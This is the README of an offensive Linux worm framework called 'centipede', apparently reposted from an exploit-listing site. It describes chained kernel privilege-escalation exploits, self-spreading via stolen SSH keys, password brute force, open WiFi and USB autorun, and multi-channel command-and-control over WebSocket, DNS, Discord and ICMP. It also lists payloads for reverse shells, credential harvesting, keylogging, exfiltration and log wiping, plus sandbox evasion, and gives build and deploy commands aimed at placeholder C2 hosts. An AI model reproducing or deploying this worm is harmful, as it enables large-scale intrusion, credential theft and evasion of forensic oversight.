Share
## https://sploitus.com/exploit?id=34313900-78E3-563B-99E6-155D8793C3A9
# centipede

Self-replicating Linux worm framework with multi-layer C2 communication, privilege escalation via kernel exploits, dark web command interface, Discord fallback, and a full payload suite for post-exploitation operations.

```
centipede/
โ”œโ”€โ”€ cmd/
โ”‚   โ”œโ”€โ”€ centipede/          # Worm implant binary
โ”‚   โ””โ”€โ”€ c2d/               # C2 server daemon
โ”œโ”€โ”€ internal/
โ”‚   โ”œโ”€โ”€ scanner/           # Network discovery and WiFi scanning
โ”‚   โ”œโ”€โ”€ exploiter/         # Kernel exploit delivery and LPE chaining
โ”‚   โ”œโ”€โ”€ replicator/        # Self-propagation across SSH, WiFi, USB
โ”‚   โ”œโ”€โ”€ c2/                # Multi-layer C2 client with fallback
โ”‚   โ”œโ”€โ”€ payloads/          # Post-exploitation payload suite
โ”‚   โ”œโ”€โ”€ sensor/            # Environment fingerprinting and sandbox detection
โ”‚   โ””โ”€โ”€ common/            # Cryptographic and system utilities
โ”œโ”€โ”€ web/                   # Dark web C2 dashboard
โ”‚   โ”œโ”€โ”€ static/css/        # Dark theme stylesheet
โ”‚   โ”œโ”€โ”€ static/js/         # Dashboard application logic
โ”‚   โ””โ”€โ”€ templates/         # HTML template
โ”œโ”€โ”€ Makefile
โ””โ”€โ”€ README.md
```

## Architecture

### Vulnerability Exploitation

The worm carries multiple kernel privilege escalation exploits:

- **dirtyfrag** (CVE-2026-43284 + CVE-2026-43500) โ€” xfrm-ESP and RxRPC page-cache write chain. Affects Linux kernels from 4.x through 6.x (2017 to present). Two variants cover each other's blind spots: xfrm-ESP provides a powerful arbitrary 4-byte STORE primitive (requires user namespace), while RxRPC requires no namespace privileges.
- **Dirty Pipe** (CVE-2022-0847) โ€” Linux 5.8 through 5.16
- **PwnKit** (CVE-2021-4034) โ€” pkexec argument injection on all distributions with pkexec
- **GameOverlay** (CVE-2023-3269) โ€” Ubuntu overlayfs vulnerability

The exploiter automatically detects kernel version, checks available kernel modules and capabilities, and chains exploits until root is obtained.

### C2 Communication Layers

Four fallback communication layers in priority order:

1.  **WebSocket** โ€” Encrypted bidirectional channel to C2 server. Primary communication method. Used when direct connectivity is available.
2.  **DNS Tunnelling** โ€” Commands and responses encoded in DNS TXT queries to a designated DNS server. Bypasses HTTP/HTTPS filtering. Used when WebSocket connectivity fails.
3.  **Discord Bot** โ€” C2 commands and results relayed through Discord channels via bot API. Uses Discord's infrastructure as a communication relay. Activated when DNS tunnelling is unavailable.
4.  **ICMP Tunnelling** โ€” Data encoded in ICMP echo payload fields. Last-resort fallback when higher layers are blocked or monitored.

All layers use end-to-end encryption with AES-GCM. The client automatically cycles through layers, falling back on connection failure and returning to higher-priority layers when connectivity is restored.

### Self-Replication

- **SSH Spread** โ€” Harvests existing SSH keys from .ssh/ directories and known_hosts files, copies the binary to discovered hosts, and executes it. Falls back to password brute-force with common credentials.
- **WiFi Spread** โ€” Scans for open WiFi networks using iw and nmcli, connects to discovered access points, and scans the new network for SSH-accessible hosts.
- **USB Spread** โ€” Detects writable removable media, copies the binary with hidden attributes and autorun.inf, enabling propagation via physical media.
- **Lateral Movement** โ€” SMB and WMI propagation for mixed Windows/Linux environments.

### C2 Server

The C2 daemon provides:
- Dark web dashboard with real-time bot monitoring
- Live WebSocket streaming for bot event updates
- Discord bot integration for command relay
- RESTful API for programmatic control
- Bot tagging and grouping for targeted command dispatch
- Command queue with execution tracking

### Payload Suite

| Payload | Description |
|---------|-------------|
| reverse_shell | Spawn reverse or bind shell on target |
| persist | Install via systemd, cron, .bashrc hooks, LD_PRELOAD |
| harvest | Extract credentials: /etc/shadow, SSH keys, env vars, DB configs, cloud credentials, Kubernetes configs |
| lateral | Inject SSH keys, scan known_hosts, discover orchestration infrastructure |
| pivot | Enable IP forwarding, SOCKS proxy, NAT masquerade |
| keylog | Capture keystrokes from input devices |
| sniff | Capture network traffic via tcpdump |
| enum | Full system enumeration: kernel, users, network, containers, cloud |
| exfil | Exfiltrate binary and harvested data via HTTP |
| wipe | Clear logs, history, journald, auditd, wtmp, randomize MAC |
| selfdestruct | Remove all traces, delete binary, and exit |

## Quick Start

### Build

```
git clone https://github.com/h0mi3e/centipede
cd centipede
make build
```

### Start C2 Server

```
./bin/c2d -addr :8443
```

To enable Discord C2 fallback:

```
./bin/c2d -addr :8443 -discord-token "YOUR_BOT_TOKEN" -discord-channel "CHANNEL_ID"
```

### Deploy Worm

With direct C2 endpoint:

```
./bin/centipede -c2 ws://YOUR_C2_IP:8443/ws/bot
```

With DNS tunnelling fallback:

```
./bin/centipede -c2 ws://YOUR_C2_IP:8443/ws/bot -c2-dns c2.yourdomain.com
```

With Discord fallback:

```
./bin/centipede -c2 ws://YOUR_C2_IP:8443/ws/bot -c2-discord-token "TOKEN" -c2-discord-channel "CHANNEL_ID"
```

All fallbacks enabled:

```
./bin/centipede \
    -c2 ws://YOUR_C2_IP:8443/ws/bot \
    -c2-dns c2.yourdomain.com \
    -c2-discord-token "TOKEN" \
    -c2-discord-channel "CHANNEL_ID" \
    -c2-icmp YOUR_C2_IP
```

## C2 Dashboard

Access the dark web dashboard at `http://YOUR_C2_IP:8443/`. The interface provides:

- Real-time bot activity feed
- Command dispatch to individual bots, tagged groups, or all bots
- Payload selection and deployment
- Exploit status monitoring
- Bot tagging and management

## Configuration

Configuration file (`/etc/centipede.conf`):

```json
{
    "c2_endpoint": "ws://c2.example.com:8443/ws/bot",
    "c2_dns_domain": "c2.example.com",
    "c2_discord_token": "YOUR_TOKEN",
    "c2_discord_channel": "CHANNEL_ID",
    "c2_icmp_target": "c2.example.com",
    "scan_interval": 300,
    "spread_interval": 300,
    "exploit": true,
    "replication": true,
    "masquerade": true
}
```

Command-line flags override config file values.

## Exploit Integration

The dirtyfrog exploit chain targets CVE-2026-43284 (xfrm-ESP page-cache write) and CVE-2026-43500 (RxRPC page-cache write). The full exploit source is available at https://github.com/V4bel/dirtyfrag.

On targets running patched kernels or without the affected modules, the exploit chain falls through to Dirty Pipe, PwnKit, and GameOverlay in sequence until root privileges are obtained or all options exhausted.

## Detection Evasion

- Sandbox environment detection before execution
- Process name masquerading as kernel threads
- Encrypted configuration blobs (no hardcoded strings)
- Forensic cleanup payload wipes shell history, system logs, journald, auditd, and login records
- MAC address randomization on compromised hosts (root only)
- Configurable sleep intervals with jitter

---

Built by ek0ms